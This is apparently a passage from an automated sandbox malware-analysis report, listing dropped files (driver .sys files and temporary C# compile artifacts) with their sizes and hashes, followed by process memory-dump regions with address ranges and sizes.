                                                                    SHA256

                                                                    5d1a788260891c317f9d05b3387e732af908959c5ad4f5a84e7984bee71084f1

                                                                    SHA512

                                                                    38269c22fda1fdee5906c2bfdfc19b77b5f6d8da2be939c6d8259b536912f8bc6f261f5c508f47ade8ab591a54aafbfbcc302219820bad19feb78fcc3586d331

                                                                  • C:\Windows\System32\drivers\b30be13d.sys

                                                                    Filesize

                                                                    368KB

                                                                    MD5

                                                                    990442d764ff1262c0b7be1e3088b6d3

                                                                    SHA1

                                                                    0b161374074ef2acc101ed23204da00a0acaa86e

                                                                    SHA256

                                                                    6c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4

                                                                    SHA512

                                                                    af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4

                                                                  • C:\Windows\System32\drivers\klupd_b30be13da_klark.sys

                                                                    Filesize

                                                                    355KB

                                                                    MD5

                                                                    9cfe1ced0752035a26677843c0cbb4e3

                                                                    SHA1

                                                                    e8833ac499b41beb6763a684ba60333cdf955918

                                                                    SHA256

                                                                    3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634

                                                                    SHA512

                                                                    29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

                                                                  • C:\Windows\System32\drivers\klupd_b30be13da_klbg.sys

                                                                    Filesize

                                                                    199KB

                                                                    MD5

                                                                    424b93cb92e15e3f41e3dd01a6a8e9cc

                                                                    SHA1

                                                                    2897ab04f69a92218bfac78f085456f98a18bdd3

                                                                    SHA256

                                                                    ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

                                                                    SHA512

                                                                    15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

                                                                  • C:\Windows\System32\drivers\klupd_b30be13da_mark.sys

                                                                    Filesize

                                                                    260KB

                                                                    MD5

                                                                    66522d67917b7994ddfb5647f1c3472e

                                                                    SHA1

                                                                    f341b9b28ca7ac21740d4a7d20e4477dba451139

                                                                    SHA256

                                                                    5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

                                                                    SHA512

                                                                    921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\bjal1043\CSC5764624E65FB4729BD1C613E2AD63EF.TMP

                                                                    Filesize

                                                                    652B

                                                                    MD5

                                                                    b4c108659d527624b3c2886bc84bc96e

                                                                    SHA1

                                                                    0b4923b63a57dcdb97237777b1525ab676873c3f

                                                                    SHA256

                                                                    90726ed10bbba617bd0996a8c2959a06621ea983a4b5e06296283de0e8690a18

                                                                    SHA512

                                                                    2c081a908396248dd96802a8334c69b58e2f2a0c0bc919044f029ecfb733ab413241219017b277300be445dc706c58869be4440fa2eb24168dd61bdbf9826997

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\bjal1043\bjal1043.0.cs

                                                                    Filesize

                                                                    8KB

                                                                    MD5

                                                                    58b10ef6ba0da88788f1aac56ce7e2db

                                                                    SHA1

                                                                    48221936b98aac14ead7c4589513d074365414ec

                                                                    SHA256

                                                                    ae11144f426028e50e77d64a66aeb954e169f627f8abfe403791032594834520

                                                                    SHA512

                                                                    19c28b5af8e4243350ee13c423fd066cef969a5c86de5f7b2ac4e4fbf75fda17e82a6a91fbd6034786b9beee77e2eb4b1cecd1cf0b901e2874b88da3e338845e

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\bjal1043\bjal1043.cmdline

                                                                    Filesize

                                                                    204B

                                                                    MD5

                                                                    239351381b9e89c79eca4cbd2f3a7a72

                                                                    SHA1

                                                                    37bc7fd8ec3a54932d4bb4628a711de73661e776

                                                                    SHA256

                                                                    3780213471cfa8522a5799b55a1456003c7096ad3104496af3bc5ba18caf9c49

                                                                    SHA512

                                                                    a8f1a421885b546c6d94b157eafd6e5636011a2dbe6bee0e0b853bf67fc5decc5faa5bedbe585f3db6e578a635bcff129c756892e71e45d55879c84e5f3da1aa

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\knwfzdsw\CSCB425D5EECDAA4CBCA6CD873CFE85A9E.TMP

                                                                    Filesize

                                                                    652B

                                                                    MD5

                                                                    b4ce79d3971046c5d9cfc807e9f0791b

                                                                    SHA1

                                                                    4ced2eeee7960ab75b48af6448ef105da8bae342

                                                                    SHA256

                                                                    fa9cc2e942ab9667ade666d7ffcc6cc70ed76f368a247f932166204fe6e9bee1

                                                                    SHA512

                                                                    81891c46d9e1b631c503ba41d6332a7e19ad11bebfddb4ab1f9023a1ab854c9c7e24a0b87214d42302b2fb32fa91cf4e190451d377803ab73195974f67e3056e

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\knwfzdsw\knwfzdsw.cmdline

                                                                    Filesize

                                                                    204B

                                                                    MD5

                                                                    d5e93438d1fe2567c0a27ad503a8d089

                                                                    SHA1

                                                                    dc3eda1ad3021d5340d49b0cd8b012367f7aab9a

                                                                    SHA256

                                                                    24d547e5dbb182ee0c4ac92b7de382486fd178ee5591d56c0e9c463b3c3c44df

                                                                    SHA512

                                                                    b47ea92c2e72fc3d9512569cf736bd5082c2d46b3a78d3f25207baea692b2340974b8bb917e85a8a39640aca333f40b09912b9114d617a6ba8fdb96aa36c7778

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\qn4rlonr\CSC1EF3E41C95864956B2411BA0A6768693.TMP

                                                                    Filesize

                                                                    652B

                                                                    MD5

                                                                    85a31d1ad92985f5277b7d8036c4c013

                                                                    SHA1

                                                                    26f719bf602a94894e40040d8a9786da48b9bcc8

                                                                    SHA256

                                                                    28e601fc616ca5177aefb38343566ca037008149e0b191137ea4114754933286

                                                                    SHA512

                                                                    1840f850f7d68d6a86bd1c4014a78f8927988fe4e51a09712fbeb6197dba7ca7bb7d653a009c61f027697086c8c2ff116a1adacd6599b97faac7a3c4019294f4

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\qn4rlonr\qn4rlonr.cmdline

                                                                    Filesize

                                                                    204B

                                                                    MD5

                                                                    694e0007757a9ef4027cc9e2ef76751a

                                                                    SHA1

                                                                    4a5afdb4ba6293f0071d83c85b0a136d48360096

                                                                    SHA256

                                                                    47607f9cddb0f5cebe08c9bf260af745940f3343dfcb46890cf87f008fdfa176

                                                                    SHA512

                                                                    4e4a141719f50c2f478f074c11828dd52360dc59e1d676e95f26000228fe59dd1d80735a236d501ce03bff9b8323ffd4390c6dad6f695f726e8ca5a17d0031b8

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\zlab2jg0\CSCC0DA4D69F5EE48FE8C3786BE59755FAC.TMP

                                                                    Filesize

                                                                    652B

                                                                    MD5

                                                                    8a936f2a4c1fc248edcf7cc7a7216bb2

                                                                    SHA1

                                                                    a3252fdaf0d22c8e37fab6738f8df106403ba4c6

                                                                    SHA256

                                                                    ed64de98dfa2deb375c265a7dd368d616912840b36af26367f9dbcef7d9f6b7e

                                                                    SHA512

                                                                    ddfcbd7b8d6e8470ee2374f0a8e5092870593da6895acc005d21150e5bfda5af12fb4218d373f7cabefd86f938e8ec41ae07bc5a08b6864d9f14a3687a49e6f9

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\zlab2jg0\zlab2jg0.cmdline

                                                                    Filesize

                                                                    204B

                                                                    MD5

                                                                    edbbfeb0d908fe599668cf9305a66f35

                                                                    SHA1

                                                                    d9f590380559a7f48b5e51a50bdd7a51d0db9092

                                                                    SHA256

                                                                    e447b105163c5cf9da711a48249b3c55043da10748ca8734837862d45c9fc393

                                                                    SHA512

                                                                    0d506ad926e6b1167aabc257e6cbc2ceea8ddb9b62dcd6b1d9f33945d63c2167f9e62036bb92142dcab44ae9e7c822e2385f7823bd343fcba23b322f8d5a7fbd

                                                                  • memory/744-122-0x00000243E13A0000-0x00000243E13A8000-memory.dmp

                                                                    Filesize

                                                                    32KB

                                                                  • memory/1872-654-0x0000018A4F970000-0x0000018A4F978000-memory.dmp

                                                                    Filesize

                                                                    32KB

                                                                  • memory/1876-97-0x0000000000400000-0x0000000000931000-memory.dmp

                                                                    Filesize

                                                                    5.2MB

                                                                  • memory/1876-103-0x000000006E600000-0x000000006E69D000-memory.dmp

                                                                    Filesize

                                                                    628KB

                                                                  • memory/1876-207-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-208-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-98-0x0000000000400000-0x0000000000931000-memory.dmp

                                                                    Filesize

                                                                    5.2MB

                                                                  • memory/1876-101-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-158-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-159-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-161-0x0000000004CD0000-0x0000000004CD1000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1876-162-0x0000000003A30000-0x0000000003B70000-memory.dmp

                                                                    Filesize

                                                                    1.2MB

                                                                  • memory/1876-160-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-163-0x0000000003A30000-0x0000000003B70000-memory.dmp

                                                                    Filesize

                                                                    1.2MB

                                                                  • memory/1876-164-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-165-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-131-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-185-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-184-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-222-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-102-0x0000000063280000-0x00000000634BE000-memory.dmp

                                                                    Filesize

                                                                    2.2MB

                                                                  • memory/1876-133-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-104-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-188-0x0000000003A30000-0x0000000003B70000-memory.dmp

                                                                    Filesize

                                                                    1.2MB

                                                                  • memory/1876-187-0x0000000003A30000-0x0000000003B70000-memory.dmp

                                                                    Filesize

                                                                    1.2MB

                                                                  • memory/1876-186-0x0000000005A60000-0x0000000005A61000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1876-193-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-105-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-195-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-198-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-130-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-107-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-205-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1876-204-0x0000000003390000-0x0000000003922000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1916-307-0x0000000000400000-0x000000000073C000-memory.dmp

                                                                    Filesize

                                                                    3.2MB

                                                                  • memory/2032-152-0x00000000008D0000-0x0000000000BE8000-memory.dmp

                                                                    Filesize

                                                                    3.1MB

                                                                  • memory/2988-609-0x0000020461AC0000-0x0000020461AC8000-memory.dmp

                                                                    Filesize

                                                                    32KB

                                                                  • memory/3192-191-0x000001DF0C030000-0x000001DF0C170000-memory.dmp

                                                                    Filesize

                                                                    1.2MB

                                                                  • memory/3192-220-0x000001DF0C180000-0x000001DF0C3B8000-memory.dmp

                                                                    Filesize

                                                                    2.2MB

                                                                  • memory/3192-206-0x000001DF0C180000-0x000001DF0C3B8000-memory.dmp

                                                                    Filesize

                                                                    2.2MB

                                                                  • memory/3192-192-0x000001DF0C030000-0x000001DF0C170000-memory.dmp

                                                                    Filesize

                                                                    1.2MB

                                                                  • memory/3192-190-0x00007FF9CBA90000-0x00007FF9CBA91000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/3192-196-0x000001DF0C180000-0x000001DF0C3B8000-memory.dmp

                                                                    Filesize

                                                                    2.2MB

                                                                  • memory/3192-194-0x000001DF0C180000-0x000001DF0C3B8000-memory.dmp

                                                                    Filesize

                                                                    2.2MB

                                                                  • memory/3496-200-0x00000000028C0000-0x000000000292B000-memory.dmp

                                                                    Filesize

                                                                    428KB

                                                                  • memory/3644-127-0x0000000003720000-0x0000000003CB2000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/3872-695-0x000001C4EE000000-0x000001C4EE022000-memory.dmp

                                                                    Filesize

                                                                    136KB

                                                                  • memory/4188-16-0x0000000005920000-0x0000000005C74000-memory.dmp

                                                                    Filesize

                                                                    3.3MB

                                                                  • memory/4188-3-0x0000000005180000-0x00000000057A8000-memory.dmp

                                                                    Filesize

                                                                    6.2MB

                                                                  • memory/4188-4-0x0000000004FA0000-0x0000000004FC2000-memory.dmp

                                                                    Filesize

                                                                    136KB

                                                                  • memory/4188-5-0x0000000005100000-0x0000000005166000-memory.dmp

                                                                    Filesize

                                                                    408KB

                                                                  • memory/4188-6-0x00000000058B0000-0x0000000005916000-memory.dmp

                                                                    Filesize

                                                                    408KB

                                                                  • memory/4188-2-0x0000000004960000-0x0000000004996000-memory.dmp

                                                                    Filesize

                                                                    216KB

                                                                  • memory/4188-17-0x0000000005F30000-0x0000000005F4E000-memory.dmp

                                                                    Filesize

                                                                    120KB

                                                                  • memory/4188-18-0x0000000005F80000-0x0000000005FCC000-memory.dmp

                                                                    Filesize

                                                                    304KB

                                                                  • memory/4188-19-0x0000000007670000-0x0000000007CEA000-memory.dmp

                                                                    Filesize

                                                                    6.5MB

                                                                  • memory/4188-20-0x0000000006480000-0x000000000649A000-memory.dmp

                                                                    Filesize

                                                                    104KB

                                                                  • memory/4188-22-0x0000000007490000-0x0000000007526000-memory.dmp

                                                                    Filesize

                                                                    600KB

                                                                  • memory/4188-23-0x0000000007420000-0x0000000007442000-memory.dmp

                                                                    Filesize

                                                                    136KB

                                                                  • memory/4188-24-0x00000000082A0000-0x0000000008844000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/4536-153-0x00000000029A0000-0x00000000029A1000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/4536-154-0x0000000002E50000-0x0000000002EB9000-memory.dmp

                                                                    Filesize

                                                                    420KB

                                                                  • memory/4900-741-0x0000000000400000-0x00000000008A7000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/4900-38260-0x0000000000400000-0x00000000008A7000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/5268-63-0x0000000000400000-0x000000000040B000-memory.dmp

                                                                    Filesize

                                                                    44KB

                                                                  • memory/5304-32-0x0000000000A30000-0x0000000000D48000-memory.dmp

                                                                    Filesize

                                                                    3.1MB

                                                                  • memory/5304-48-0x0000000000A30000-0x0000000000D48000-memory.dmp

                                                                    Filesize

                                                                    3.1MB

                                                                  • memory/6072-95-0x0000021D76B00000-0x0000021D76B08000-memory.dmp

                                                                    Filesize

                                                                    32KB

                                                                  • memory/6072-82-0x0000021D79F90000-0x0000021D7B124000-memory.dmp

                                                                    Filesize

                                                                    17.6MB

                                                                  • memory/6104-65-0x00000000008D0000-0x0000000000BE8000-memory.dmp

                                                                    Filesize

                                                                    3.1MB

                                                                  • memory/6104-66-0x00000000008D0000-0x0000000000BE8000-memory.dmp

                                                                    Filesize

                                                                    3.1MB

                                                                  • memory/6104-67-0x00000000008D0000-0x0000000000BE8000-memory.dmp

                                                                    Filesize

                                                                    3.1MB

                                                                  • memory/6104-132-0x00000000008D0000-0x0000000000BE8000-memory.dmp

                                                                    Filesize

                                                                    3.1MB

                                                                  • memory/6104-46-0x00000000008D0000-0x0000000000BE8000-memory.dmp

                                                                    Filesize

                                                                    3.1MB

                                                                  • memory/6104-189-0x00000000008D0000-0x0000000000BE8000-memory.dmp

                                                                    Filesize

                                                                    3.1MB

                                                                  • memory/8204-38775-0x0000000000E50000-0x00000000012E3000-memory.dmp

                                                                    Filesize

                                                                    4.6MB

                                                                  • memory/8204-38792-0x0000000000E50000-0x00000000012E3000-memory.dmp

                                                                    Filesize

                                                                    4.6MB

                                                                  • memory/14204-38257-0x00000000008D0000-0x0000000000BE8000-memory.dmp

                                                                    Filesize

                                                                    3.1MB

                                                                  • memory/14204-38255-0x00000000008D0000-0x0000000000BE8000-memory.dmp

                                                                    Filesize

                                                                    3.1MB